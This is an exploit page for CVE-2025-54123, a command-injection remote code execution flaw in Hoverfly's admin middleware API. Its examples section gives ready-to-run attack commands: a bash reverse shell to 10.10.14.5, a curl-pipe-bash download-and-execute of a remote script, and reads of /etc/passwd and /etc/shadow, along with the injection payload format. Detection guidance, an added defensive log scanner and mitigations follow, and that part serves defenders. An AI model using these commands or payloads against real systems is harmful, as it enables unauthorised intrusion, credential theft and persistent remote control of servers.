## https://sploitus.com/exploit?id=7D2225D0-B40A-5995-9A58-ABE3114FC271
# CVE-2025-54123 Exploit
Hoverfly Authenticated Middleware Command Injection RCE | CVSS 9.8 CRITICAL
## Vulnerability
```
Hoverfly -u -p -c [--shell SHELL]
```
- `-t, --target` - Hoverfly API endpoint (required)
- `-u, --username` - Admin username (required)
- `-p, --password` - Admin password (required)
- `-c, --command` - Command to execute (required)
- `--shell` - Shell binary to use (default: /bin/bash)
## Examples
```bash
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami
# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"
# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"
# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh
# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"
```
## Attack Flow
1. Attacker authenticates with valid admin credentials (Basic Auth)
2. Sends PUT request to `/api/v2/hoverfly/middleware` with malicious payload
3. Hoverfly writes script to temporary file `/tmp/hoverfly_`
4. During validation, executes: ` /tmp/hoverfly_`
5. Command output returned in error response STDOUT section
6. Exploit extracts and displays output
## Payload Structure
```json
{
  "binary": "/bin/bash",
  "script": "whoami"
}
```
HTTP headers include:
```
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json
```
## Impact
- **Full Remote Code Execution** with Hoverfly process privileges
- **Credential Theft** - steal API keys, tokens, secrets
- **Internal Network Pivot** - compromise adjacent systems
- **Data Exfiltration** - access simulation data, configurations
- **Persistence** - install backdoors, maintain access
- **Service Disruption** - modify/delete middleware configs
## Vulnerable Code Locations
- `core/middleware/middleware.go:94-96` - No input validation on binary parameter
- `core/middleware/local_middleware.go:14-19` - Unsafe exec.Command() usage
- `core/hoverfly_service.go:173` - Immediate execution during validation
## Affected Versions
- Hoverfly <= 1.11.3
- All installations with Admin API accessible and authentication enabled
## Detection
Look for:
- PUT requests to `/api/v2/hoverfly/middleware`
- Error responses containing "STDOUT:" with command output
- Temporary files in `/tmp/hoverfly/`
- Unusual process executions from hoverfly service
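One way to turn the indicators above into a check, as an added example that is not part of the original exploit or of Hoverfly: a small Python scanner over request records captured in front of the Admin API. The JSON-per-line log format, the `response` field and the allowlist of interpreters are assumptions for this example; the sample records are constructed.

```python
import json
import re

MIDDLEWARE_PATH = "/api/v2/hoverfly/middleware"
# Interpreters an operator would normally configure for middleware scripts
# (assumed allowlist for this example, not a list shipped with Hoverfly).
ALLOWED_BINARIES = {"python", "python3", "node", "ruby"}

# Constructed sample log: one JSON record per request, with the request body
# and the start of the response captured by a reverse proxy. Not real output.
SAMPLE_LOG = r'''
{"method":"GET","path":"/api/v2/hoverfly","status":200,"body":""}
{"method":"PUT","path":"/api/v2/hoverfly/middleware","status":200,"body":"{\"binary\":\"python3\",\"script\":\"import sys\\nprint(sys.stdin.read())\"}"}
{"method":"PUT","path":"/api/v2/hoverfly/middleware","status":400,"body":"{\"binary\":\"/bin/bash\",\"script\":\"id; uname -a\"}","response":"... STDOUT: uid=1000(hoverfly) ..."}
'''

def classify(record):
    """Return the reasons this request looks like CVE-2025-54123 abuse (empty if none)."""
    reasons = []
    if record.get("method") != "PUT" or record.get("path") != MIDDLEWARE_PATH:
        return reasons
    try:
        payload = json.loads(record.get("body") or "{}")
    except json.JSONDecodeError:
        return ["middleware update with unparsable body"]
    binary = payload.get("binary", "")
    if binary.rsplit("/", 1)[-1] not in ALLOWED_BINARIES:
        reasons.append(f"unexpected middleware binary: {binary!r}")
    if re.search(r"[;&|`$]", payload.get("script", "")):
        reasons.append("shell metacharacters in middleware script")
    if "STDOUT:" in record.get("response", ""):
        reasons.append("command output echoed in error response")
    return reasons

def scan(log_text):
    """Return (line_number, reasons) for every suspicious record in the log."""
    hits = []
    for n, line in enumerate(filter(None, log_text.strip().splitlines()), 1):
        reasons = classify(json.loads(line))
        if reasons:
            hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

Any hit on the binary or script check is worth a ticket on its own; the `STDOUT:` check corroborates that the validation step actually ran the submitted command.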
## Mitigation
- Upgrade to patched version (if available)
- Restrict Admin API access to trusted IPs only
- Use strong authentication credentials
- Monitor `/api/v2/hoverfly/middleware` endpoint access
- Implement input validation on binary/script parameters
## References
- CVE-2025-54123
- CWE-78 (OS Command Injection)
- CWE-20 (Improper Input Validation)
- GHSA-r4h8-hfp2-ggmf
- https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
- https://nvd.nist.gov/vuln/detail/CVE-2025-54123
## Credits
Original discovery: [@Kr1shna4garwal](https://github.com/Kr1shna4garwal)